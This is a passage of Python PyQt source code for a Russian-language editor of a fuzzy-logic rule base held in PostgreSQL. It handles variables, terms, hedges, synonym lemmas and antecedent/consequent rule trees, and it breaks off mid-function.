self.uiRemoveConsequentNodeButton.clicked.connect(self.onRemoveConsequentNodeClicked)\n\n self.uiCommitRuleButton.clicked.connect(self.commitRule)\n\n # Initialize debug tab\n\n self.uiModeCombo.addItem('Переменные', 0)\n self.uiModeCombo.addItem('Термы', 1)\n self.uiModeCombo.addItem('Модификаторы', 2)\n self.uiModeCombo.addItem('Переменные и термы', 3)\n self.uiModeCombo.addItem('Переменные и модификаторы', 4)\n self.uiModeCombo.addItem('Синонимы', 5)\n self.uiModeCombo.addItem('Правила', 6)\n self.uiModeCombo.addItem('Узлы', 7)\n self.uiModeCombo.currentIndexChanged.connect(self.onModeSelected)\n self.uiModeCombo.setCurrentIndex(-1)\n\n # Initialize main window\n\n self.uiTabs.setCurrentIndex(0)\n self.uiTabs.currentChanged.connect(self.onTabChanged)\n\n def getLemmas(self, group):\n cur = self.conn.cursor()\n cur.execute('SELECT lemma FROM synonims WHERE group_id = %s ORDER BY hits DESC;', (group,))\n lemmas = []\n for row in cur.fetchall():\n lemmas.append(row[0])\n cur.close()\n return lemmas\n\n def fillComboWithLemmas(self, combo, table):\n combo.clear()\n cur = self.conn.cursor()\n cur.execute('SELECT id, name, name_id FROM %s;' % table)\n for row in cur.fetchall():\n if (row[1] != ''):\n combo.addItem(row[1], row[0])\n else:\n combo.addItem(', '.join(self.getLemmas(row[2])), row[0])\n cur.close()\n combo.setCurrentIndex(-1)\n\n def fillComboWithNames(self, combo, table):\n combo.clear()\n cur = self.conn.cursor()\n cur.execute('SELECT id, name FROM %s;' % table)\n for row in cur.fetchall():\n combo.addItem(row[1], row[0])\n cur.close()\n combo.setCurrentIndex(-1)\n\n # Actions on variables tab\n\n def loadTerms(self):\n self.fillComboWithLemmas(self.uiTermsCombo, 'terms')\n self.uiAddTermButton.setEnabled(False)\n\n def loadHedges(self):\n self.fillComboWithLemmas(self.uiHedgesCombo, 'hedges')\n self.uiAddHedgeButton.setEnabled(False)\n\n def onVariableSelected(self):\n if (self.uiVariablesCombo.isEditable() == True):\n return\n\n self.uiTermsCombo.setCurrentIndex(-1)\n self.uiAddTermButton.setEnabled(False)\n self.uiRemoveTermButton.setEnabled(False)\n self.uiHedgesCombo.setCurrentIndex(-1)\n self.uiAddHedgeButton.setEnabled(False)\n self.uiRemoveHedgeButton.setEnabled(False)\n self.uiCommitVariableButton.setEnabled(False)\n self.uiVariableVerifiedCheck.setChecked(False)\n self.uiRangeMinEdit.clear()\n self.uiRangeMaxEdit.clear()\n self.uiTermsList.clear()\n self.uiHedgesList.clear()\n\n if (self.uiVariablesCombo.currentIndex() == -1):\n self.uiRenameVariableButton.setEnabled(False)\n self.uiDeleteVariableButton.setEnabled(False)\n self.uiVariableVerifiedCheck.setEnabled(False)\n self.uiRangeMinEdit.setEnabled(False)\n self.uiRangeMaxEdit.setEnabled(False)\n self.uiTermsCombo.setEnabled(False)\n self.uiTermsList.setEnabled(False)\n self.uiHedgesCombo.setEnabled(False)\n self.uiHedgesList.setEnabled(False)\n return\n\n self.variableRenamed = False\n\n if (self.uiVariablesCombo.currentData() != 0):\n cur = self.conn.cursor()\n cur.execute('SELECT terms.id, terms.name, terms.name_id FROM variables, terms, variables_terms WHERE variables.id = %s AND variables.id = variables_terms.variable_id AND terms.id = variables_terms.term_id;', (self.uiVariablesCombo.currentData(),))\n for row in cur.fetchall():\n if (row[1] != ''):\n item = QListWidgetItem(row[1])\n else:\n item = QListWidgetItem(', '.join(self.getLemmas(row[2])))\n item.setData(Qt.UserRole, row[0])\n self.uiTermsList.addItem(item)\n cur.close()\n self.loadTerms()\n\n cur = self.conn.cursor()\n cur.execute('SELECT hedges.id, hedges.name, hedges.name_id FROM variables, hedges, variables_hedges WHERE variables.id = %s AND variables.id = variables_hedges.variable_id AND hedges.id = variables_hedges.hedge_id;', (self.uiVariablesCombo.currentData(),))\n for row in cur.fetchall():\n if (row[1] != ''):\n item = QListWidgetItem(row[1])\n else:\n item = QListWidgetItem(', '.join(self.getLemmas(row[2])))\n item.setData(Qt.UserRole, row[0])\n self.uiHedgesList.addItem(item)\n cur.close()\n self.loadHedges()\n\n cur = self.conn.cursor()\n cur.execute('SELECT min, max FROM variables WHERE id = %s;', (self.uiVariablesCombo.currentData(),))\n range = cur.fetchone()\n if (range):\n self.uiRangeMinEdit.setText('%s' % range[0])\n self.uiRangeMaxEdit.setText('%s' % range[1])\n\n cur = self.conn.cursor()\n cur.execute('SELECT validated FROM variables WHERE id = %s;', (self.uiVariablesCombo.currentData(),))\n state = cur.fetchone()\n if (state[0] == True):\n self.uiVariableVerifiedCheck.setChecked(True);\n\n self.uiRenameVariableButton.setEnabled(True)\n self.uiDeleteVariableButton.setEnabled(True)\n self.uiVariableVerifiedCheck.setEnabled(True)\n self.uiRangeMinEdit.setEnabled(True)\n self.uiRangeMaxEdit.setEnabled(True)\n self.uiTermsCombo.setEnabled(True)\n self.uiTermsList.setEnabled(True)\n self.uiHedgesCombo.setEnabled(True)\n self.uiHedgesList.setEnabled(True)\n\n def onTermSelected(self):\n self.uiAddTermButton.setEnabled(True)\n\n def onVariableTermSelected(self):\n self.uiRemoveTermButton.setEnabled(True)\n\n def onAddTermClicked(self):\n found = False\n for index in range(self.uiTermsList.count()):\n if (self.uiTermsList.item(index).data(Qt.UserRole) == self.uiTermsCombo.currentData()):\n found = True\n break\n if (not found):\n item = QListWidgetItem(self.uiTermsCombo.currentText())\n item.setData(Qt.UserRole, self.uiTermsCombo.currentData())\n self.uiTermsList.addItem(item)\n self.checkChanges()\n\n def onRemoveTermClicked(self):\n self.uiTermsList.takeItem(self.uiTermsList.currentRow())\n if (self.uiTermsList.count() == 0):\n self.uiRemoveTermButton.setEnabled(False)\n self.checkChanges()\n\n def onHedgeSelected(self):\n self.uiAddHedgeButton.setEnabled(True)\n\n def onVariableHedgeSelected(self):\n self.uiRemoveHedgeButton.setEnabled(True)\n\n def onAddHedgeClicked(self):\n found = False\n for index in range(self.uiHedgesList.count()):\n if (self.uiHedgesList.item(index).data(Qt.UserRole) == self.uiHedgesCombo.currentData()):\n found = True\n break\n if (not found):\n item = QListWidgetItem(self.uiHedgesCombo.currentText())\n item.setData(Qt.UserRole, self.uiHedgesCombo.currentData())\n self.uiHedgesList.addItem(item)\n self.checkChanges()\n\n def onRemoveHedgeClicked(self):\n self.uiHedgesList.takeItem(self.uiHedgesList.currentRow())\n if (self.uiHedgesList.count() == 0):\n self.uiRemoveHedgeButton.setEnabled(False)\n self.checkChanges()\n\n def onCreateVariableClicked(self):\n self.currentVariable = -1\n self.uiVariablesCombo.setCurrentIndex(-1)\n self.uiVariablesCombo.setEditable(True)\n self.uiVariablesCombo.lineEdit().returnPressed.connect(self.onVariableEntered)\n self.uiVariablesCombo.setFocus()\n self.uiCreateVariableButton.setEnabled(False)\n\n def onRenameVariableClicked(self):\n self.currentVariable = self.uiVariablesCombo.currentIndex()\n self.uiVariablesCombo.setEditable(True)\n self.uiVariablesCombo.lineEdit().returnPressed.connect(self.onVariableEntered)\n self.uiVariablesCombo.setFocus()\n self.uiCreateVariableButton.setEnabled(False)\n self.uiRenameVariableButton.setEnabled(False)\n self.uiDeleteVariableButton.setEnabled(False)\n\n def onVariableEntered(self):\n self.variableRenamed = False\n self.uiVariablesCombo.setEditable(False)\n self.uiCreateVariableButton.setEnabled(True)\n self.uiRenameVariableButton.setEnabled(True)\n self.uiDeleteVariableButton.setEnabled(True)\n if (self.currentVariable >= 0):\n name = self.uiVariablesCombo.currentText()\n self.uiVariablesCombo.removeItem(self.uiVariablesCombo.currentIndex())\n if (self.uiVariablesCombo.itemText(self.currentVariable) != name):\n self.uiVariablesCombo.setItemText(self.currentVariable, name)\n self.variableRenamed = True\n self.uiVariablesCombo.setCurrentIndex(self.currentVariable)\n self.checkChanges()\n else:\n self.uiVariablesCombo.setCurrentIndex(self.currentVariable)\n else:\n self.uiVariablesCombo.setItemData(self.uiVariablesCombo.currentIndex(), 0)\n self.onVariableSelected()\n\n def onDeleteVariableClicked(self):\n cur = self.conn.cursor()\n cur.execute('DELETE FROM variables WHERE id = %s;', (self.uiVariablesCombo.currentData(),))\n self.conn.commit()\n cur.close()\n self.uiVariablesCombo.removeItem(self.uiVariablesCombo.currentIndex())\n\n def checkChanges(self):\n self.uiCommitVariableButton.setEnabled(True)\n\n def onVariableVerified(self):\n self.checkChanges()\n\n def commitVariable(self):\n if (self.uiRangeMinEdit.text() == ''):\n self.uiRangeMinEdit.setText('-inf')\n if (self.uiRangeMaxEdit.text() == ''):\n self.uiRangeMaxEdit.setText('+inf')\n self.uiCommitVariableButton.setEnabled(False)\n cur = self.conn.cursor()\n variable_id = self.uiVariablesCombo.currentData()\n if (variable_id):\n cur.execute('UPDATE variables SET validated = %s, min = %s, max = %s WHERE id = %s;', \n (self.uiVariableVerifiedCheck.isChecked(), self.uiRangeMinEdit.text(), \n self.uiRangeMaxEdit.text(), variable_id))\n if (self.variableRenamed == True):\n cur.execute('UPDATE variables SET name = %s WHERE id = %s;', (self.uiVariablesCombo.currentText(), variable_id))\n cur.execute('DELETE FROM variables_terms WHERE variable_id = %s;', (variable_id,))\n cur.execute('DELETE FROM variables_hedges WHERE variable_id = %s;', (variable_id,))\n else:\n cur.execute('INSERT INTO groups (is_variable, is_term, is_hedge) VALUES (true, false, false) RETURNING id;')\n group_id = cur.fetchone()[0]\n for lemma in self.uiVariablesCombo.currentText().replace(' ', '').split(','):\n cur.execute('INSERT INTO synonims (group_id, lemma, grammemes, hits) VALUES (%s, %s, %s, 0);', (group_id, lemma, ''));\n cur.execute('INSERT INTO variables (name_id, name, validated, min, max) VALUES (%s, %s, %s, %s, %s) RETURNING id;', \n (group_id, self.uiVariablesCombo.currentText(), self.uiVariableVerifiedCheck.isChecked(), \n self.uiRangeMinEdit.text(), self.uiRangeMaxEdit.text()))\n variable_id = cur.fetchone()[0]\n self.uiVariablesCombo.setItemData(self.uiVariablesCombo.currentIndex(), variable_id)\n for i in range(0, self.uiTermsList.count()):\n cur.execute('INSERT INTO variables_terms (variable_id, term_id) VALUES (%s, %s);', \n (variable_id, self.uiTermsList.item(i).data(Qt.UserRole)))\n for j in range(0, self.uiHedgesList.count()):\n cur.execute('INSERT INTO variables_hedges (variable_id, hedge_id) VALUES (%s, %s);', \n (variable_id, self.uiHedgesList.item(j).data(Qt.UserRole)))\n self.conn.commit()\n cur.close()\n\n # Actions on terms tab\n\n def onTerm2Selected(self):\n if (self.uiTerms2Combo.isEditable() == True):\n return\n\n self.uiCommitTermButton.setEnabled(False)\n self.uiTermVerifiedCheck.setChecked(False)\n self.uiPointsEdit.clear()\n\n if (self.uiTerms2Combo.currentIndex() == -1):\n self.uiRenameTermButton.setEnabled(False)\n self.uiDeleteTermButton.setEnabled(False)\n self.uiTermVerifiedCheck.setEnabled(False)\n self.uiFunctionCombo.setCurrentIndex(-1)\n self.uiFunctionCombo.setEnabled(False)\n self.uiPointsEdit.setEnabled(False)\n return\n\n self.termRenamed = False\n\n if (self.uiTerms2Combo.currentData() != 0):\n self.uiFunctionCombo.blockSignals(True)\n cur = self.conn.cursor()\n cur.execute('SELECT functions.name FROM terms, functions WHERE functions.id = terms.function_id AND terms.id = %s;', \n (self.uiTerms2Combo.currentData(),))\n name = cur.fetchone()\n if (name):\n self.uiFunctionCombo.setCurrentText(name[0])\n else:\n self.uiFunctionCombo.setCurrentIndex(-1)\n self.uiFunctionCombo.blockSignals(False)\n\n cur = self.conn.cursor()\n cur.execute('SELECT points FROM terms WHERE id = %s;', (self.uiTerms2Combo.currentData(),))\n points = cur.fetchone()\n if (points):\n self.uiPointsEdit.setText('%s' % points[0])\n\n cur = self.conn.cursor()\n cur.execute('SELECT validated FROM terms WHERE id = %s;', (self.uiTerms2Combo.currentData(),))\n state = cur.fetchone()\n if (state[0] == True):\n self.uiTermVerifiedCheck.setChecked(True);\n\n self.uiRenameTermButton.setEnabled(True)\n self.uiDeleteTermButton.setEnabled(True)\n self.uiTermVerifiedCheck.setEnabled(True)\n self.uiPointsEdit.setEnabled(True)\n self.uiFunctionCombo.setEnabled(True)\n\n def onCreateTermClicked(self):\n self.currentTerm = -1\n self.uiTerms2Combo.setCurrentIndex(-1)\n self.uiTerms2Combo.setEditable(True)\n self.uiTerms2Combo.lineEdit().returnPressed.connect(self.onTermEntered)\n self.uiTerms2Combo.setFocus()\n self.uiCreateTermButton.setEnabled(False)\n\n def onRenameTermClicked(self):\n self.currentTerm = self.uiTerms2Combo.currentIndex()\n self.uiTerms2Combo.setEditable(True)\n self.uiTerms2Combo.lineEdit().returnPressed.connect(self.onTermEntered)\n self.uiTerms2Combo.setFocus()\n self.uiCreateTermButton.setEnabled(False)\n self.uiRenameTermButton.setEnabled(False)\n self.uiDeleteTermButton.setEnabled(False)\n\n def onTermEntered(self):\n self.termRenamed = False\n self.uiTerms2Combo.setEditable(False)\n self.uiCreateTermButton.setEnabled(True)\n self.uiRenameTermButton.setEnabled(True)\n self.uiDeleteTermButton.setEnabled(True)\n if (self.currentTerm >= 0):\n name = self.uiTerms2Combo.currentText()\n self.uiTerms2Combo.removeItem(self.uiTerms2Combo.currentIndex())\n if (self.uiTerms2Combo.itemText(self.currentTerm) != name):\n self.uiTerms2Combo.setItemText(self.currentTerm, name)\n self.termRenamed = True\n self.uiTerms2Combo.setCurrentIndex(self.currentTerm)\n self.checkPoints()\n else:\n self.uiTerms2Combo.setCurrentIndex(self.currentTerm)\n else:\n self.uiTerms2Combo.setItemData(self.uiTerms2Combo.currentIndex(), 0)\n self.onTerm2Selected()\n self.uiFunctionCombo.setFocus()\n\n def onDeleteTermClicked(self):\n cur = self.conn.cursor()\n cur.execute('DELETE FROM terms WHERE id = %s;', (self.uiTerms2Combo.currentData(),))\n self.conn.commit()\n cur.close()\n self.uiTerms2Combo.removeItem(self.uiTerms2Combo.currentIndex())\n\n def checkPoints(self):\n if (self.uiPointsEdit.text() != ''):\n self.uiCommitTermButton.setEnabled(True)\n else:\n self.uiCommitTermButton.setEnabled(False)\n\n def onTermVerified(self):\n self.checkPoints()\n\n def onFunctionSelected(self):\n if (self.uiFunctionCombo.currentIndex() != -1):\n self.checkPoints()\n\n def commitTerm(self):\n self.uiCommitTermButton.setEnabled(False)\n cur = self.conn.cursor()\n term_id = self.uiTerms2Combo.currentData()\n if (term_id):\n cur.execute('UPDATE terms SET validated = %s, function_id = %s, points = %s WHERE id = %s;', \n (self.uiTermVerifiedCheck.isChecked(), self.uiFunctionCombo.currentData(), \n self.uiPointsEdit.text(), term_id))\n if (self.termRenamed == True):\n cur.execute('UPDATE terms SET name = %s WHERE id = %s;', (self.uiTerms2Combo.currentText(), term_id))\n else:\n cur.execute('INSERT INTO groups (is_variable, is_term, is_hedge) VALUES (false, true, false) RETURNING id;')\n group_id = cur.fetchone()[0]\n for lemma in self.uiTerms2Combo.currentText().replace(' ', '').split(','):\n cur.execute('INSERT INTO synonims (group_id, lemma, grammemes, hits) VALUES (%s, %s, %s, 0);', \n (group_id, lemma, ''));\n cur.execute('INSERT INTO terms (validated, name, name_id, function_id, points) VALUES (%s, %s, %s, %s, %s) RETURNING id;', \n (self.uiTermVerifiedCheck.isChecked(), self.uiTerms2Combo.currentText(), \n group_id, self.uiFunctionCombo.currentData(), self.uiPointsEdit.text()))\n term_id = cur.fetchone()[0]\n self.uiTerms2Combo.setItemData(self.uiTerms2Combo.currentIndex(), term_id)\n self.conn.commit()\n cur.close()\n\n # Actions on hedges tab\n\n def onHedge2Selected(self):\n if (self.uiHedges2Combo.isEditable() == True):\n return\n\n self.uiCommitHedgeButton.setEnabled(False)\n self.uiHedgeVerifiedCheck.setChecked(False)\n self.uiResultEdit.clear()\n\n if (self.uiHedges2Combo.currentIndex() == -1):\n self.uiRenameHedgeButton.setEnabled(False)\n self.uiDeleteHedgeButton.setEnabled(False)\n self.uiHedgeVerifiedCheck.setEnabled(False)\n self.uiResultEdit.setEnabled(False)\n return\n\n self.hedgeRenamed = False\n\n if (self.uiHedges2Combo.currentData() != 0):\n cur = self.conn.cursor()\n cur.execute('SELECT result FROM hedges WHERE id = %s;', (self.uiHedges2Combo.currentData(),))\n result = cur.fetchone()\n if (result):\n self.uiResultEdit.setText('%s' % result[0])\n\n cur = self.conn.cursor()\n cur.execute('SELECT validated FROM hedges WHERE id = %s;', (self.uiHedges2Combo.currentData(),))\n state = cur.fetchone()\n if (state[0] == True):\n self.uiHedgeVerifiedCheck.setChecked(True);\n\n self.uiRenameHedgeButton.setEnabled(True)\n self.uiDeleteHedgeButton.setEnabled(True)\n self.uiHedgeVerifiedCheck.setEnabled(True)\n self.uiResultEdit.setEnabled(True)\n\n def onCreateHedgeClicked(self):\n self.currentHedge = -1\n self.uiHedges2Combo.setCurrentIndex(-1)\n self.uiHedges2Combo.setEditable(True)\n self.uiHedges2Combo.lineEdit().returnPressed.connect(self.onHedgeEntered)\n self.uiHedges2Combo.setFocus()\n self.uiCreateHedgeButton.setEnabled(False)\n\n def onRenameHedgeClicked(self):\n self.currentHedge = self.uiHedges2Combo.currentIndex()\n self.uiHedges2Combo.setEditable(True)\n self.uiHedges2Combo.lineEdit().returnPressed.connect(self.onHedgeEntered)\n self.uiHedges2Combo.setFocus()\n self.uiCreateHedgeButton.setEnabled(False)\n self.uiRenameHedgeButton.setEnabled(False)\n self.uiDeleteHedgeButton.setEnabled(False)\n\n def onHedgeEntered(self):\n self.hedgeRenamed = False\n self.uiHedges2Combo.setEditable(False)\n self.uiCreateHedgeButton.setEnabled(True)\n self.uiRenameHedgeButton.setEnabled(True)\n self.uiDeleteHedgeButton.setEnabled(True)\n if (self.currentHedge >= 0):\n name = self.uiHedges2Combo.currentText()\n self.uiHedges2Combo.removeItem(self.uiHedges2Combo.currentIndex())\n if (self.uiHedges2Combo.itemText(self.currentHedge) != name):\n self.uiHedges2Combo.setItemText(self.currentHedge, name)\n self.hedgeRenamed = True\n self.uiHedges2Combo.setCurrentIndex(self.currentHedge)\n self.checkResult()\n else:\n self.uiHedges2Combo.setCurrentIndex(self.currentHedge)\n else:\n self.uiHedges2Combo.setItemData(self.uiHedges2Combo.currentIndex(), 0)\n self.onHedge2Selected()\n self.uiResultEdit.setFocus()\n\n def onDeleteHedgeClicked(self):\n cur = self.conn.cursor()\n cur.execute('DELETE FROM hedges WHERE id = %s;', (self.uiHedges2Combo.currentData(),))\n self.conn.commit()\n cur.close()\n self.uiHedges2Combo.removeItem(self.uiHedges2Combo.currentIndex())\n\n def checkResult(self):\n if (self.uiResultEdit.text() != ''):\n self.uiCommitHedgeButton.setEnabled(True)\n else:\n self.uiCommitHedgeButton.setEnabled(False)\n\n def onHedgeVerified(self):\n self.checkResult()\n\n def commitHedge(self):\n self.uiCommitHedgeButton.setEnabled(False)\n cur = self.conn.cursor()\n hedge_id = self.uiHedges2Combo.currentData()\n if (hedge_id):\n cur.execute('UPDATE hedges SET validated = %s, result = %s WHERE id = %s;', \n (self.uiHedgeVerifiedCheck.isChecked(), self.uiResultEdit.text(), hedge_id))\n if (self.hedgeRenamed == True):\n cur.execute('UPDATE hedges SET name = %s WHERE id = %s;', (self.uiHedges2Combo.currentText(), hedge_id))\n else:\n cur.execute('INSERT INTO groups (is_variable, is_term, is_hedge) VALUES (false, false, true) RETURNING id;')\n group_id = cur.fetchone()[0]\n for lemma in self.uiHedges2Combo.currentText().replace(' ', '').split(','):\n cur.execute('INSERT INTO synonims (group_id, lemma, grammemes, hits) VALUES (%s, %s, %s, 0);', \n (group_id, lemma, ''));\n cur.execute('INSERT INTO hedges (validated, name, name_id, result) VALUES (%s, %s, %s, %s) RETURNING id;', \n (self.uiHedgeVerifiedCheck.isChecked(), self.uiHedges2Combo.currentText(), group_id, self.uiResultEdit.text()))\n hedge_id = cur.fetchone()[0]\n self.uiHedges2Combo.setItemData(self.uiHedges2Combo.currentIndex(), hedge_id)\n self.conn.commit()\n cur.close()\n\n # Actions on rules tab\n\n def loadTree(self, tree, name, rule_id):\n cur = self.conn.cursor()\n query = 'SELECT nodes.id, types.name FROM rules, nodes, types WHERE rules.%s_id = nodes.id' % name\n cur.execute(query + ' AND rules.id = %s AND types.id = nodes.type_id;', (rule_id,))\n root = cur.fetchone()\n cur.close()\n if (root):\n item = QTreeWidgetItem()\n item.setText(0, '(%s)' % root[1])\n item.setText(1, '%s' % root[0])\n tree.addTopLevelItem(item)\n cur = self.conn.cursor()\n cur.execute('SELECT nodes.id, nodes.parent_id, types.name, types.id FROM nodes, types, closures WHERE nodes.id = closures.descendant_id AND closures.ancestor_id = %s AND nodes.type_id = types.id AND nodes.parent_id IS NOT NULL ORDER BY nodes.parent_id ASC, types.id ASC;', (root[0],))\n nodes = cur.fetchall()\n cur.close()\n for node in nodes:\n if (node[2] in ('variable', 'term', 'hedge')):\n cur = self.conn.cursor()\n query = 'SELECT %ss.name_id, %ss.name FROM %ss, nodes WHERE %ss.id = nodes.%s_id' % (node[2], node[2], node[2], node[2], node[2])\n cur.execute(query + ' AND nodes.id = %s;', (node[0],))\n row = cur.fetchone()\n if (row[1] != ''):\n name = '(%s) ' % node[2] + row[1]\n else:\n name = '(%s) ' % node[2] + ', '.join(self.getLemmas(row[0])) \n cur.close()\n else:\n name = '(%s)' % node[2]\n parents = tree.findItems('%s' % node[1], Qt.MatchExactly | Qt.MatchRecursive, 1)\n item = QTreeWidgetItem()\n item.setText(0, '%s' % name)\n item.setText(1, '%s' % node[0])\n parents[0].addChild(item)\n\n def nodeToString(self, node):\n if not node:\n return '?'\n cur = self.conn.cursor()\n cur.execute('SELECT types.name FROM nodes, types WHERE nodes.type_id = types.id AND nodes.id = %s;', (node.text(1),))\n name = cur.fetchone()[0]\n cur.close()\n if (name in ('variable', 'term', 'hedge')):\n cur = self.conn.cursor()\n query = 'SELECT %ss.name_id, %ss.name FROM %ss, nodes WHERE %ss.id = nodes.%s_id' % (name, name, name, name, name)\n cur.execute(query + ' AND nodes.id = %s;', (node.text(1),))\n row = cur.fetchone()\n if (row[1] != ''):\n token = '\\'' + row[1] + '\\''\n else:\n token = '\\'' + ', '.join(self.getLemmas(row[0])) + '\\''\n cur.close()\n elif (name == 'variable_and'):\n token = '(%s)' % (self.nodeToString(node.child(0)))\n for i in range(node.childCount() - 1):\n token = '%s И (%s)' % (token, self.nodeToString(node.child(i + 1)))\n elif (name == 'variable_or'):\n token = '(%s)' % (self.nodeToString(node.child(0)))\n for i in range(node.childCount() - 1):\n token = '%s ИЛИ (%s)' % (token, self.nodeToString(node.child(i + 1)))\n elif (name == 'variable_value'):\n token = '%s ЕСТЬ %s' % (self.nodeToString(node.child(0)), self.nodeToString(node.child(1)))\n elif (name == 'term_complex'):\n token = '%s %s' % (self.nodeToString(node.child(0)), self.nodeToString(node.child(1)))\n else:\n token = ''\n return token\n\n def onRuleSelected(self):\n if (self.uiRulesCombo.isEditable() == True):\n return\n\n self.uiCommitRuleButton.setEnabled(False)\n self.uiNoteEdit.clear()\n self.uiNoteEdit.setEnabled(False)\n self.uiRuleVerifiedCheck.setChecked(False)\n self.uiAntecedentTree.clear()\n self.uiAntecedentEdit.clear()\n self.uiAntecedentEdit.setEnabled(False)\n self.uiConsequentTree.clear()\n self.uiConsequentEdit.clear()\n self.uiConsequentEdit.setEnabled(False)\n\n if (self.uiRulesCombo.currentIndex() == -1):\n self.uiRenameRuleButton.setEnabled(False)\n self.uiDeleteRuleButton.setEnabled(False)\n self.uiRuleVerifiedCheck.setEnabled(False)\n self.uiAntecedentNodeTypesCombo.setEnabled(False)\n self.uiAntecedentNodesCombo.setEnabled(False)\n self.uiAddAntecedentNodeButton.setEnabled(False)\n self.uiRemoveAntecedentNodeButton.setEnabled(False)\n self.uiAntecedentTree.setEnabled(False)\n self.uiConsequentNodeTypesCombo.setEnabled(False)\n self.uiConsequentNodesCombo.setEnabled(False)\n self.uiAddConsequentNodeButton.setEnabled(False)\n self.uiRemoveConsequentNodeButton.setEnabled(False)\n self.uiConsequentTree.setEnabled(False)\n return\n\n if (self.uiRulesCombo.currentData() != 0):\n cur = self.conn.cursor()\n cur.execute('SELECT validated, note FROM rules WHERE id = %s;', (self.uiRulesCombo.currentData(),))\n data = cur.fetchone()\n\n if (data[0] == True):\n self.uiRuleVerifiedCheck.setChecked(True);\n\n self.uiNoteEdit.setText(data[1])\n\n self.loadTree(self.uiAntecedentTree, 'antecedent', self.uiRulesCombo.currentData())\n if self.uiAntecedentTree.topLevelItemCount() > 0:\n self.uiAntecedentTree.setCurrentItem(self.uiAntecedentTree.topLevelItem(0))\n self.loadTree(self.uiConsequentTree, 'consequent', self.uiRulesCombo.currentData())\n if self.uiConsequentTree.topLevelItemCount() > 0:\n self.uiConsequentTree.setCurrentItem(self.uiConsequentTree.topLevelItem(0))\n else:\n self.uiRuleVerifiedCheck.setChecked(False);\n\n self.onAntecedentNodeSelected()\n self.onConsequentNodeSelected()\n\n self.uiRenameRuleButton.setEnabled(True)\n self.uiDeleteRuleButton.setEnabled(True)\n self.uiRuleVerifiedCheck.setEnabled(True)\n self.uiNoteEdit.setEnabled(True)\n self.uiAntecedentTree.setEnabled(True)\n self.uiConsequentTree.setEnabled(True)\n\n def onCreateRuleClicked(self):\n self.currentRule = -1\n self.uiRulesCombo.setCurrentIndex(-1)\n self.uiRulesCombo.setEditable(True)\n self.uiRulesCombo.lineEdit().returnPressed.connect(self.onRuleEntered)\n self.uiRulesCombo.setFocus()\n self.uiCreateRuleButton.setEnabled(False)\n\n def onRenameRuleClicked(self):\n self.currentRule = self.uiRulesCombo.currentIndex()\n self.uiRulesCombo.setEditable(True)\n self.uiRulesCombo.lineEdit().returnPressed.connect(self.onRuleEntered)\n self.uiRulesCombo.setFocus()\n self.uiCreateRuleButton.setEnabled(False)\n self.uiRenameRuleButton.setEnabled(False)\n self.uiDeleteRuleButton.setEnabled(False)\n\n def onRuleEntered(self):\n self.uiRulesCombo.setEditable(False)\n self.uiCreateRuleButton.setEnabled(True)\n self.uiRenameRuleButton.setEnabled(True)\n self.uiDeleteRuleButton.setEnabled(True)\n if (self.currentRule >= 0):\n name = self.uiRulesCombo.currentText()\n self.uiRulesCombo.removeItem(self.uiRulesCombo.currentIndex())\n if (self.uiRulesCombo.itemText(self.currentRule) != name):\n self.uiRulesCombo.setItemText(self.currentRule, name)\n self.uiRulesCombo.setCurrentIndex(self.currentRule)\n self.uiCommitRuleButton.setEnabled(True)\n else:\n self.uiRulesCombo.setCurrentIndex(self.currentRule)\n else:\n self.uiRulesCombo.setItemData(self.uiRulesCombo.currentIndex(), 0)\n self.onRuleSelected()\n\n def onDeleteRuleClicked(self):\n cur = self.conn.cursor()\n if self.uiAntecedentTree.topLevelItemCount() > 0:\n cur.execute('DELETE FROM nodes WHERE id = %s;', (self.uiAntecedentTree.topLevelItem(0).text(1),))\n if self.uiConsequentTree.topLevelItemCount() > 0:\n cur.execute('DELETE FROM nodes WHERE id = %s;', (self.uiConsequentTree.topLevelItem(0).text(1),))\n if self.uiRulesCombo.currentData() != 0:\n cur.execute('DELETE FROM rules WHERE id = %s;', (self.uiRulesCombo.currentData(),))\n self.conn.commit()\n cur.close()\n self.uiRulesCombo.blockSignals(True)\n self.uiRulesCombo.removeItem(self.uiRulesCombo.currentIndex())\n self.uiRulesCombo.setCurrentIndex(-1)\n self.uiRulesCombo.blockSignals(False)\n self.onRuleSelected()\n\n def findParent(self, node):\n parent = node.parent()\n while True:\n parent_type = self.nodeType(parent)\n if parent_type == 'variable_value':\n break\n parent = parent.parent()\n return parent.child(0).text(1)\n\n def fillComboWithValues(self, combo, node, type_name):\n name = self.nodeType(node)\n cur = self.conn.cursor()\n combo.blockSignals(True)\n combo.clear()\n if type_name == 'variable':\n cur.execute('SELECT id, name FROM variables;')\n elif type_name == 'term':\n if name == 'variable_value':\n node_id = node.child(0).text(1)\n elif name in ('term_complex', 'term_and', 'term_or'):\n node_id = self.findParent(node)\n cur.execute('SELECT terms.id, terms.name FROM nodes, variables_terms, terms WHERE nodes.id = %s AND variables_terms.variable_id = nodes.variable_id AND terms.id = variables_terms.term_id;', (node_id,))\n elif type_name == 'hedge':\n node_id = self.findParent(node)\n cur.execute('SELECT hedges.id, hedges.name FROM nodes, variables_hedges, hedges WHERE nodes.id = %s AND variables_hedges.variable_id = nodes.variable_id AND hedges.id = variables_hedges.hedge_id;', (node_id,))\n for row in cur.fetchall():\n combo.addItem(row[1], row[0])\n combo.setCurrentIndex(-1)\n combo.blockSignals(False)\n cur.close()\n\n def onAntecedentNodeTypeSelected(self):\n self.uiAntecedentNodesCombo.clear()\n self.uiAntecedentNodesCombo.setEnabled(False)\n if (self.uiAntecedentNodeTypesCombo.currentIndex() == -1):\n return\n self.uiAntecedentNodesCombo.blockSignals(True)\n if (self.uiAntecedentNodeTypesCombo.currentText() in ('variable', 'term', 'hedge')):\n self.fillComboWithValues(self.uiAntecedentNodesCombo, self.uiAntecedentTree.currentItem(),\n self.uiAntecedentNodeTypesCombo.currentText())\n self.uiAntecedentNodesCombo.setEnabled(True)\n self.uiAddAntecedentNodeButton.setEnabled(False)\n else:\n self.uiAddAntecedentNodeButton.setEnabled(True)\n self.uiAntecedentNodesCombo.blockSignals(False)\n\n def onAntecedentNodeValueSelected(self):\n if (self.uiAntecedentNodesCombo.currentIndex() != -1):\n self.uiAddAntecedentNodeButton.setEnabled(True)\n\n def addNode(self, tree, nodesCombo, nodeTypesCombo, addNodeButton, removeNodeButton, edit):\n parent_id = None\n variable_id = None\n term_id = None\n hedge_id = None\n if (tree.currentItem()):\n parent_id = tree.currentItem().text(1)\n if (nodeTypesCombo.currentText() == 'variable'):\n variable_id = nodesCombo.currentData()\n elif (nodeTypesCombo.currentText() == 'term'):\n term_id = nodesCombo.currentData()\n elif (nodeTypesCombo.currentText() == 